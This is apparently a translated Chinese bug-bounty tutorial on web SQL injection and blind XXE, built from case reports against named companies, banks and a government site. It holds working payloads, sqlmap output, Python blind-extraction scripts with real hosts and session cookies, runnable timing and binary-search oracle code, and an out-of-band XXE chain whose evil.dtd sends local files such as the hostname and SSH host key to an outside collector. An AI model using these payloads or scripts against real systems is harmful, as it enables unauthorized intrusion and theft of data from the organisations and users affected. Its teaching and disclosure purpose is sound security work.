Prerequisite tutorials:
WEB Vulnerability Hunting (SRC) Detailed Tutorial: Information Gathering - CSDN Blog
WEB Vulnerability Hunting (SRC) Detailed Tutorial: Authentication and Business-Logic Consistency - CSDN Blog
WEB Vulnerability Hunting (SRC) Detailed Tutorial: Business Data Tampering - CSDN Blog
2.4 User input validation
2.4.1 Injection testing
a. Manual injection
1. Enter a single quote ' in a parameter. If it breaks the syntax of the query being executed, the server's error echo reveals the database type, and the injection statements can then be built for that database.
For example, take a GET URL http://www.Xxx.com/abc.asp?p=YY
and change the value of p: http://www.Xxx.com/abc.asp?p=YY and user>0
This tells you whether the backend is SQL Server and, at the same time, gives the name of the login the application connects with: in SQL Server user is an nvarchar value, so comparing it with the integer 0 forces a type conversion, which fails with an error message that quotes the value it could not convert. In the same way, http://www.xxx.com/abc.asp?p=YY&n … db_name()>0
not only confirms SQL Server but also leaks the name of the database currently in use, because db_name() fails the same conversion.
2. Blind injection: most of the time the web server has error echo switched off.
http://www.xxx.com/abc.asp?p=1 and 1=2
the SQL condition is false: the result is empty or the page errors;
http://www.xxx.com/abc.asp?p=1 and 1=1
the SQL condition is true: the normal page comes back.
If both probes behave as expected, the injected SQL is being executed and a SQL injection vulnerability exists. Always compare against the untouched p=1 response: the 1=1 page must be identical to it and the 1=2 page must differ, otherwise a site that serves the same page for every value will look injectable when it is not.
Manual injection example on a site: logging in with the password ' or '1'='1 turns the check into ... AND password='' or '1'='1', which is always true, and lands in the admin backend.
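The three probes above, as an added example that is not part of the original tutorial: a stand-in for the abc.asp?p=YY page backed by an in-memory SQLite database (constructed sample rows; page_vulnerable, page_fixed and probe are hypothetical names), with the string-concatenated query beside its validated, parameterized version, and a probe() that applies the single-quote, and 1=1 and and 1=2 checks and reports which signals fire.

```python
import sqlite3

# Constructed sample data standing in for the target's product table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO product VALUES (?, ?)", [(1, "widget"), (2, "gadget")])


def page_vulnerable(p):
    """Parameter pasted straight into the statement: the pattern every case
    on this page exploits. Returns ("error", msg) or ("ok", rows)."""
    try:
        rows = conn.execute(f"SELECT name FROM product WHERE id = {p}").fetchall()
    except sqlite3.Error as e:          # error echo: the DB's own message leaks out
        return ("error", str(e))
    return ("ok", rows)


def page_fixed(p):
    """Same page done right: check the type, then bind the value, so no
    input can change the structure of the statement."""
    if not p.isdigit():
        return ("ok", [])               # junk input is "not found", no DB error exposed
    rows = conn.execute("SELECT name FROM product WHERE id = ?", (int(p),)).fetchall()
    return ("ok", rows)


def probe(page, p="1"):
    """Run the three manual probes from the text against a page function."""
    base = page(p)
    quote = page(p + "'")                 # probe 1: unbalanced quote -> syntax error
    tautology = page(p + " and 1=1")      # probe 2a: must equal the base response
    contradiction = page(p + " and 1=2")  # probe 2b: must come back empty
    return {
        "error_echo": quote[0] == "error",
        "boolean_diff": tautology == base
                        and contradiction == ("ok", [])
                        and base != contradiction,
    }


if __name__ == "__main__":
    print("vulnerable:", probe(page_vulnerable))   # both signals fire
    print("fixed:     ", probe(page_fixed))        # neither signal fires
```

The Boolean check deliberately needs all three responses: without the base response a page that ignores its parameter would pass the 1=1 test trivially.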
a.a Blind injection after LIMIT
Case: a time-based blind injection after LIMIT in 同花顺 (ROOT privileges / 11 databases accessible)
The following location was found to be injectable (parameter limit; time-based blind after LIMIT):
http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/list-data?classify=1&flag=fancy&limit=3&order=1&page=1&sort=totalrate&type=0&version=1.1.23.1
Payload (7-second delay):
http://ft.10jqka.com.cn/thsft/iFindService/CellPhone/i-strategy/list-data?classify=1&flag=fancy&limit=1/**/procedure/**/analyse(extractvalue(1,benchmark(25000000,md5(111))),1)+--+-&order=1&page=1&sort=totalrate&type=0&version=1.1.23.1
Why it works: in MySQL 5.x, PROCEDURE ANALYSE() is one of the few clauses allowed after LIMIT (along with INTO OUTFILE and FOR UPDATE), so it is the vehicle for an injection point that sits after the limit value. The expression passed as its first argument is evaluated, and benchmark() wrapped in extractvalue() keeps the server busy for a measurable time; that delay is the only signal, hence time-based blind. /**/ stands in for spaces, and --+- decodes to "-- -", which comments out the rest of the query (MySQL requires whitespace after --). PROCEDURE ANALYSE was removed in MySQL 8.0, so the trick only applies to older servers.
1. Current database user: ROOT
2. All databases: 11 in total
a.b Boolean-based SQL blind injection
Case: a SQL blind injection in a 263 communications app (with verification script)
263网络会议 3.0 client download page (263云通信)
Download the app. The "quick join" feature calls this endpoint:
POST http://cc.263.net/rest/netmeeting/quickLoginNet HTTP/1.1
Content-Type: application/json;charset=UTF-8
Content-Length: 65
Host: cc.263.net
Connection: Keep-Alive
{"pCode":"46867588","username":"lisi","clientType":10}
Injection point: pCode
Boolean-based blind: the response differs depending on whether the injected condition is true or false.
false:
true:
Database user:
BOSSAPP@192.168.99.67
Python verification script:
import time
import http.client

# Target and request shape as captured above
HOST = 'cc.263.net'
URL = '/rest/netmeeting/quickLoginNet'
headers = {'Content-Type': 'application/json;charset=UTF-8'}
# Candidate characters for the user name; MySQL's default collation compares
# case-insensitively, so upper case alone is enough
payloads = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'

print('[%s] Start to retrieve db user:' % time.strftime('%H:%M:%S', time.localtime()))
user = ''
for i in range(1, 36):
    matched = False
    for payload in payloads:
        # pCode becomes: 46867588' or MID(user(),i,1)='X
        # The closing quote of the application's own query terminates the last
        # string literal, so no comment sequence is needed
        data = ('{"pCode":"46867588\' or MID(user(),%d,1)=\'%s","username":"lisi","clientType":10}'
                % (i, payload))
        conn = http.client.HTTPConnection(HOST, timeout=60)
        conn.request('POST', URL, body=data, headers=headers)
        html_doc = conn.getresponse().read().decode('utf-8', 'replace')
        conn.close()
        print('.', end='', flush=True)
        # The response carries code 80007 when the injected condition is true
        if '80007' in html_doc:
            matched = True
            user += payload
            print('\n[in progress]', user, end='', flush=True)
            break
        time.sleep(0.1)
    if not matched:
        break   # no candidate matched at this position: end of the string
print('\n[Done] db user is %s' % user)
a.c Pseudo-static DB2 Boolean-based blind injection
Case: Boolean-based blind injection through a pseudo-static URL on a bank's main site (DB2)
http://.../bugs/wooyun-2016-0211479/trace/8722c6d1776df3a473e61e3dc44c12f9
http://.../Site/Home/CN
Pseudo-static means the parameter is a path segment of a rewritten URL rather than a query-string value, so it has to be marked explicitly for sqlmap with an asterisk (for example /Site/Home/CN*). No WAF, so sqlmap was run directly; the database was not dumped.
available databases [10]:
[*] DB2INST1
[*] NULLID
[*] SQLJ
[*] SYSCAT
[*] SYSFUN
[*] SYSIBM
[*] SYSIBMADM
[*] SYSPROC
[*] SYSSTAT
[*] SYSTOOLS
current database: 'CMSDB'
database management system users [1]:
[*] DB2INST1
[313 tables]
+--------------------------------+
| ADVISE_WORKLOAD |
| AREA |
| AREA_EMAIL |
| COMPANY_LOANS |
| D2S_BLOCK_TEMPLATEMAP |
| D2S_CHANEL_CHANEL_RELATIONSHIP |
| D2S_CHANNEL_BLOCKMAP |
| D2S_CHANNEL_INFO_RELATIONSHIP |
| D2S_CHANNEL_TEMPLATEMAP |
| D2S_INFO_BLOCKMAP |
| D2S_INFO_CHANNEL_RELATIONSHIP |
| D2S_INFO_INFO_RELATIONSHIP |
| D2S_INFO_TEMPLATEMAP |
| D2S_TEMPLATE |
| EMAIL_SEND_LOG |
a.d Pseudo-static SQL Boolean-based blind injection
Case: Boolean-based blind injection through a pseudo-static URL on a bank's main site, running as root
http://...//cmsDeskArticle/bankCardType/1  (injection point)
Testing showed that information_schema could not be used and even sqlmap gave up; with enough patience the table names could still be guessed.
Proof of vulnerability:
Tools could not run against it, so the values were pulled out by hand, one character at a time, by comparing ascii(mid(...)) with a candidate code (the letter after each payload is the character it confirmed):
1' or length(database())=7 and 1=1 or '1'='
1' or ascii(mid((database()),1,1))=102 and 1=1 or '1'=' f
1' or ascii(mid((database()),2,1))=120 and 1=1 or '1'=' x
1' or ascii(mid((database()),3,1))=45 and 1=1 or '1'=' -
1' or ascii(mid((database()),4,1))=98 and 1=1 or '1'=' b
1' or ascii(mid((database()),5,1))=97 and 1=1 or '1'=' a
1' or ascii(mid((database()),6,1))=110 and 1=1 or '1'=' n
1' or ascii(mid((database()),7,1))=107 and 1=1 or '1'=' k
fx-bank
1' or ascii(mid(version(),1,1))=53 and 1=1 or '1'=' 5
1' or ascii(mid(version(),2,1))=46 and 1=1 or '1'=' .
1' or ascii(mid(version(),3,1))=53 and 1=1 or '1'=' 5
1' or ascii(mid(version(),4,1))=46 and 1=1 or '1'=' .
1' or ascii(mid(version(),5,1))=50 and 1=1 or '1'=' 2
1' or ascii(mid(version(),6,1))=49 and 1=1 or '1'=' 1
1' or ascii(mid(version(),7,1))=45 and 1=1 or '1'=' -
1' or ascii(mid(version(),8,1))=108 and 1=1 or '1'=' l
1' or ascii(mid(version(),9,1))=111 and 1=1 or '1'=' o
1' or ascii(mid(version(),10,1))=103 and 1=1 or '1'=' g
5.5.21-log
1' or ascii(mid(user(),1,1))=114 and 1=1 or '1'=' r
1' or ascii(mid(user(),2,1))=111 and 1=1 or '1'=' o
1' or ascii(mid(user(),3,1))=111 and 1=1 or '1'=' o
1' or ascii(mid(user(),4,1))=116 and 1=1 or '1'=' t
1' or ascii(mid(user(),5,1))=64 and 1=1 or '1'=' @
1' or ascii(mid(user(),6,1))=108 and 1=1 or '1'=' l
root@localhost
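The scripts in this case and in the 263 case above walk a character set linearly, which costs up to one request per candidate character per position. Added example, not code from either report: the same Boolean oracle against a constructed in-memory SQLite stand-in for the pCode check, with the length and each character recovered by binary search on its code point, about seven requests per character. SQLite's unicode()/substr() replace MySQL's ascii()/mid(); the wrapper x' or (...) or '1'=' is the one the bank payloads use, and quick_login, oracle, smallest_true and extract are hypothetical names.

```python
import sqlite3

# Constructed sample: one meeting code, queried by string concatenation.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE meeting (pcode TEXT)")
conn.execute("INSERT INTO meeting VALUES ('46867588')")
requests_sent = 0


def quick_login(pcode):
    """Vulnerable endpoint: all it reveals is whether a row matched."""
    try:
        return conn.execute(
            f"SELECT 1 FROM meeting WHERE pcode = '{pcode}'").fetchone() is not None
    except sqlite3.Error:
        return False


def oracle(condition):
    """One yes/no question. The application's own closing quote completes
    the trailing '1'=' so the statement stays well-formed."""
    global requests_sent
    requests_sent += 1
    return quick_login(f"x' or ({condition}) or '1'='")


def smallest_true(question, lo, hi):
    """Binary search: the smallest v in [lo, hi] for which question(v) holds,
    given that question(v) means 'value <= v' and is therefore monotone."""
    while lo < hi:
        mid = (lo + hi) // 2
        if question(mid):
            hi = mid
        else:
            lo = mid + 1
    return lo


def extract(expr, max_len=64):
    """Recover the value of an SQL expression through the oracle.
    Values longer than max_len are truncated."""
    length = smallest_true(lambda v: oracle(f"length({expr}) <= {v}"), 0, max_len)
    value = ""
    for i in range(1, length + 1):
        code = smallest_true(
            lambda v: oracle(f"unicode(substr({expr}, {i}, 1)) <= {v}"), 32, 126)
        value += chr(code)
    return value


if __name__ == "__main__":
    assert oracle("1=1") and not oracle("1=2")      # confirm the injection first
    print(extract("sqlite_version()"), "recovered in", requests_sent, "requests")
```

Against MySQL the two questions become length(expr) <= v and ascii(mid(expr, i, 1)) <= v; against Oracle, length() and ascii(substr(...)). Printable ASCII (32 to 126) needs at most seven questions per character, which is what makes hand-driven extraction of a user name or version string practical when tools fail.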
a.e Time-based blind injection
Case: a time-based blind injection in 迅雷 (Xunlei)
Captured POST request:
POST /location/upload_peerinfo HTTP/1.1
Host: interface.xl9.xunlei.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: sessionid=CC824A20602118045BF9B8150499AD86; userid=50947382; peerid=50E549E88890F5GQ; client=pc; v=7.10.33.358
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
{"cpu":"","devicename":"ZHONGWEN","devicetype":"pc","imei":"","memory":""}
Both devicename and devicetype are injection points. sqlmap output:
Parameter: JSON devicename ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: {"cpu":"","devicename":"ZHONGWEN' AND (SELECT * FROM (SELECT(SLEEP(5)))DEhT) AND 'AgGq'='AgGq","devicetype":"pc","imei":"","memory":""}
Parameter: JSON devicetype ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: {"cpu":"","devicename":"ZHONGWEN","devicetype":"pc' AND (SELECT * FROM (SELECT(SLEEP(5)))KNUs) AND 'HTgX'='HTgX","imei":"","memory":""}
available databases [6]:
[*] xl9\x81\x81omplain
[*] information_schema
[*] x
[*] xl9_location
[*] xl9_tracer
[*] xl9_user_ip_loc
[15:55:53] [INFO] fetching tables for database: 'xl9_user_ip_loc'
[15:55:53] [INFO] fetching number of tables for database 'xl9_user_ip_loc'
[15:55:53] [INFO] resumed: 257
The xl9_user_ip_loc database is large (257 tables); presumably it holds users' IP records.
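Both time-based cases on this page (the benchmark() payload after LIMIT and the SLEEP() payloads sqlmap found here) reduce to one question: did the response come back late? Added example, not sqlmap's or the reports' code: a constructed in-memory SQLite target with a registered sleep() standing in for MySQL's SLEEP(), a timing oracle that re-measures slow responses so network jitter cannot produce a false "true", and bitwise extraction of a string with seven timed questions per character. upload_peerinfo, timed_oracle and extract_timed are hypothetical names; the payload keeps the original devicename='ZHONGWEN' condition true, as sqlmap's did.

```python
import sqlite3
import time

# SQLite has no SLEEP(); register one so the stand-in behaves like MySQL.
conn = sqlite3.connect(":memory:")
conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
conn.execute("CREATE TABLE peerinfo (devicename TEXT)")      # constructed sample
conn.execute("INSERT INTO peerinfo VALUES ('ZHONGWEN')")

DELAY = 0.2               # seconds the branch sleeps when the condition is true
THRESHOLD = DELAY / 2     # responses slower than this count as "slept"


def upload_peerinfo(devicename):
    """Vulnerable handler: no body, no error, nothing but response time leaks."""
    sql = f"SELECT count(*) FROM peerinfo WHERE devicename = '{devicename}'"
    try:
        conn.execute(sql).fetchone()
    except sqlite3.Error:
        pass


def timed_oracle(condition, confirmations=2):
    """True if the injected CASE branch slept. Jitter only ever makes a
    response slower, so a fast response settles the answer at once, while a
    slow one is measured again before it is believed."""
    payload = (f"ZHONGWEN' AND (CASE WHEN ({condition}) THEN sleep({DELAY}) ELSE 0 END)"
               " AND '1'='1")
    for _ in range(confirmations):
        start = time.monotonic()
        upload_peerinfo(payload)
        if time.monotonic() - start < THRESHOLD:
            return False
    return True


def extract_timed(expr, length):
    """Read `expr` bit by bit: one timed question per bit of each character's
    code, so 7 questions per character instead of one per candidate."""
    value = ""
    for i in range(1, length + 1):
        code = 0
        for bit in (64, 32, 16, 8, 4, 2, 1):
            if timed_oracle(f"(unicode(substr({expr}, {i}, 1)) & {bit}) = {bit}"):
                code |= bit
        value += chr(code)
    return value


if __name__ == "__main__":
    print("injectable:", timed_oracle("1=1"), timed_oracle("1=2"))   # True False
    print(extract_timed("'xl9'", 3))
```

MySQL evaluates AND SLEEP(n) once for every row that satisfies the preceding conditions, so the observed delay scales with the number of matching rows; keeping the original equality in front of the injected clause bounds that to the rows the real query would have matched, and sqlmap's (SELECT * FROM (SELECT(SLEEP(5)))x) form sleeps once through a derived table for the same reason. Pick DELAY well above the target's normal latency variance and always re-confirm a positive before trusting a bit.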
a.f Oracle blind injection
Case: Oracle blind injection in the 新疆人社厅 site (with verification script)
Injection URL:
http://.../wcm/cm_ly/goToLycont.action?fhtype=1&id=8a4ac70250f05d9e0151590e127808da' AND length(SYS_CONTEXT('USERENV','CURRENT_USER'))=3 AND 'xxx'='xxx
The id parameter is not filtered properly, which leads to SQLi.
http://.../wcm/cm_ly/goToLycont.action?fhtype=1&id=8a4ac70250f05d9e0151590e127808da' AND length(SYS_CONTEXT('USERENV','CURRENT_USER'))=3 AND 'xxx'='xxx
returns the normal page;
http://.../wcm/cm_ly/goToLycont.action?fhtype=1&id=8a4ac70250f05d9e0151590e127808da' AND length(SYS_CONTEXT('USERENV','CURRENT_USER'))=4 AND 'xxx'='xxx
returns a different page, so the current user name is 3 characters long. That length goes straight into the script. CURRENT_USER and OS_USER are shown as examples; the other USERENV attributes are read the same way.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author:
import requests

url = "http://**.**.**.**/wcm/cm_ly/goToLycont.action?fhtype=1&id=8a4ac70250f05d9e0151590e127808da"
# Oracle string comparison is case-sensitive, so both cases are tried
payloads = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@_.'
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
    "Cookie": "JSESSIONID=5V1JXjMpQLtR92RxJ62KrMQLfY4t6xpdQCBfcXLHtT2yz4jsT7Gr!1478879510",
    "Accept": ""
}
# String that appears in the response only when the injected condition is true
TRUE_MARK = "20151130234113"


def getData(attr, length):
    """Recover SYS_CONTEXT('USERENV', attr) one character at a time.
    Oracle substr() positions start at 1; substr(x, 0, 1) also returns the
    first character, so starting the loop at 0 would duplicate it."""
    value = ''
    for i in range(1, length + 1):
        for exp in payloads:
            payload = "' AND substr(SYS_CONTEXT('USERENV','%s'),%d,1)='%s' AND 'xxx'='xxx" % (attr, i, exp)
            try:
                r = requests.get(url + payload, headers=header, allow_redirects=False, timeout=100)
            except requests.RequestException:
                continue        # transient network error: try the next candidate
            if TRUE_MARK in r.text:
                value += exp
                print('\n %s is: %s' % (attr, value), end='', flush=True)
                break
    print('\n[Done] Oracle %s is %s' % (attr, value))
    return value


if __name__ == '__main__':
    getData('CURRENT_USER', 3)    # length 3 was established by the probes above
    getData('OS_USER', 13)
Verification result:
a.g Blind XXE
Case: a blind XXE in a 网易 (NetEase) host, used to demonstrate reading file contents with CloudEye as the out-of-band channel
An XML external entity injection found in the wild.
Address: http://106.2.32.66:8080/webdav/
IP location:
There is a webdav directory that accepts XML request bodies via the PROPFIND method. Build an XXE test payload:
PROPFIND /webdav/ HTTP/1.1
Content-type: application/xml
Depth: 0
Connection: Keep-alive
TE: trailers
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Host: 106.2.32.66:8080
Content-Length: 172
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtz3zkd [
<!ENTITY % dtd SYSTEM "http://66ae2b.dnslog.info/">
%dtd;]>
<propfind xmlns="DAV:"><allprop/></propfind>
CloudEye Apache log:
Response data:
<?xml version="1.0" encoding="utf-8" ?>
<multistatus xmlns="DAV:"><response><href>/webdav/</href>
<propstat><prop><creationdate>2015-07-13T12:13:57Z</creationdate>
<displayname><![CDATA[]]></displayname>
<resourcetype><collection/></resourcetype>
<source></source>
<supportedlock><lockentry><lockscope><exclusive/></lockscope><locktype><write/>
</locktype></lockentry><lockentry><lockscope><shared/></lockscope><locktype><wr
ite/></locktype></lockentry></supportedlock>
</prop>
<status>HTTP/1.1 200 OK</status>
</propstat>
</response>
</multistatus>
The DNS/HTTP hit on the CloudEye host proves the parser tried to fetch an external resource while parsing the XML, so an XXE vulnerability exists.
Subsequent attempts to get the entity content echoed in the response failed, so the next step is to retrieve the blind XXE result through CloudEye. Create a DTD file that sends the result out:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://66ae2b.dnslog.info/?xml1=%payload;'>">
%all;
Host it at http://...:8080/xml/evil.dtd, then build a request payload that reads the hostname:
PROPFIND /webdav/ HTTP/1.1
Content-type: application/xml
Depth: 0
Connection: Keep-alive
TE: trailers
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Host: 106.2.32.66:8080
Content-Length: 172
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % payload SYSTEM "file:///proc/sys/kernel/hostname">
<!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd">
%dtd;
%send;
]>
<propfind xmlns="DAV:"><allprop/></propfind>
CloudEye Apache log:
The hostname obtained is classa-popoatispam1, which looks like NetEase POPO's anti-spam system. When a file contains line breaks, #, <, > or other special characters, the content breaks the XML syntax and the payload no longer parses, so arbitrary file read is not yet achieved; a base64 or URL-encoding wrapper might get around this, but I did not manage it /(ㄒoㄒ)/~~. Even so, a lot of valuable content can be read, for example /etc/issue.net:
PROPFIND /webdav/ HTTP/1.1
Content-type: application/xml
Depth: 0
Connection: Keep-alive
TE: trailers
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Host: 106.2.32.66:8080
Content-Length: 172
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % payload SYSTEM "file:///etc/issue.net">
<!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd">
%dtd;
%send;
]>
<propfind xmlns="DAV:"><allprop/></propfind>
Result: Debian%20GNU/Linux%207 (that is, "Debian GNU/Linux 7" once the URL encoding is undone)
Reading /etc/ssh/ssh_host_rsa_key.pub:
PROPFIND /webdav/ HTTP/1.1
Content-type: application/xml
Depth: 0
Connection: Keep-alive
TE: trailers
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Host: 106.2.32.66:8080
Content-Length: 172
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % payload SYSTEM "file:///etc/ssh/ssh_host_rsa_key.pub">
<!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd">
%dtd;
%send;
]>
<propfind xmlns="DAV:"><allprop/></propfind>
Result:
ssh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQCcdWadpFCGUL9soWpo7KIc4/WlcwkcvqOeMfnCS4sSmT+fsQ1FMY+h6Ab+xQrvrhp4ufIN/iR92SMeIYLCxg+DSIXKdxKob9luJKdF/zl4UY/qTmRaQaAPlAgZsPHnBMKT5BW08ZMX+NzH8jQQx6xHCkx4Bqom88NMfePN0ydYwGzehS/7oh0s9JYgo8knTJ6eke7y/ohtzMLjCoBQHfAOTtyRPoFSyfc2ksU/rZOvAPteQvmhyc1geAmngcGV0eabzhSmNHcrxqeKZ5wK7zOmoGeoEZrfxADCHlDbf6P+XJ3HjgDZg1iBHNH4hjkdNGkVCaxpRg9CD+V/G3Ddn0Xl%20root@classa-popoatispam1
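Added helpers for the out-of-band channel used in this case (my code, not the report's): builders for the attacker-side DTD and the PROPFIND body, a check for file contents that cannot survive being spliced into a URI, and a parser that pulls the decoded values out of the collector's access log. collector.example and attacker.example are placeholders for the dnslog host and the server that hosted evil.dtd; the log lines are constructed, with the values the report recovered.

```python
import re
from urllib.parse import unquote

COLLECTOR = "http://collector.example/"                  # placeholder for the dnslog host
DTD_URL = "http://attacker.example:8080/xml/evil.dtd"    # placeholder for the DTD server


def build_evil_dtd(collector=COLLECTOR):
    """Attacker-hosted DTD. Expanding %all declares %send, whose SYSTEM URI
    carries the file content (%payload;) out in the query string."""
    return ('<?xml version="1.0" encoding="UTF-8"?>\n'
            '<!ENTITY % all "<!ENTITY % send SYSTEM '
            f"'{collector}?xml1=%payload;'\">\n"
            '%all;\n')


def build_propfind(target_file, dtd_url=DTD_URL):
    """PROPFIND body: %payload reads the file, %dtd fetches our DTD, %send fires."""
    return ('<?xml version="1.0" encoding="utf-8"?>\n'
            '<!DOCTYPE a [\n'
            f'<!ENTITY % payload SYSTEM "file://{target_file}">\n'
            f'<!ENTITY % dtd SYSTEM "{dtd_url}">\n'
            '%dtd;\n'
            '%send;\n'
            ']>\n'
            '<propfind xmlns="DAV:"><allprop/></propfind>\n')


# Why arbitrary files do not come back: the raw file text is spliced into a URI
# inside an entity value. '#' starts a URI fragment (everything after it is
# dropped), '<' and '&' may not appear literally in an entity value, '%' starts
# a parameter-entity reference, quotes end the literal, and the report found
# line breaks fatal as well.
BREAKERS = set('\r\n#<&%"\'')


def oob_safe(content):
    """Will this file content survive the round trip unmodified?"""
    return not (set(content) & BREAKERS)


# Request field of an Apache access-log line for our collector URL
LOG_RE = re.compile(r'"GET /\?xml1=([^ "]*) HTTP/1\.[01]"')


def exfiltrated_values(log_text):
    """URL-decoded exfiltrated strings, in the order the collector logged them."""
    return [unquote(m.group(1)) for m in LOG_RE.finditer(log_text)]


# Constructed sample log; 203.0.113.9 is a documentation address, not the target
SAMPLE_LOG = (
    '203.0.113.9 - - [13/Jul/2015:12:30:01 +0000] '
    '"GET /?xml1=classa-popoatispam1 HTTP/1.1" 200 - "-" "-"\n'
    '203.0.113.9 - - [13/Jul/2015:12:31:12 +0000] '
    '"GET /?xml1=Debian%20GNU/Linux%207 HTTP/1.1" 200 - "-" "-"\n'
)

if __name__ == "__main__":
    print(build_propfind("/etc/issue.net"))
    print(exfiltrated_values(SAMPLE_LOG))
    print(oob_safe("Debian GNU/Linux 7"), oob_safe("root:x:0:0:root:/root:/bin/bash\n"))
```

oob_safe() is the check to run against the files you intend to read before spending requests: single-line values such as a hostname, an OS banner or a public key go through, while /etc/passwd or a private key will not without an encoding wrapper that the target's parser supports.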
b. Automated injection detection with tools
SQLmap: a free, open-source tool for detecting and exploiting SQL injection
sqlmap.py -u [url] --cookie [cookie] --dbs  // list the databases
sqlmap.py -u [url] -D [database] --tables  // list the tables of a database
sqlmap.py -u [url] -D [database] -T [table] --columns  // list the columns of a table
sqlmap.py -u [url] -D dvwa -T users -C user,password --dump  // dump the user names and passwords (sqlmap offers to crack any password hashes it finds with its built-in dictionary attack)
Database dump example
Case: SQL injection in a 兴业银行 site
http://shop.cib.com.cn//?m=product&s=detail&id=457 is injectable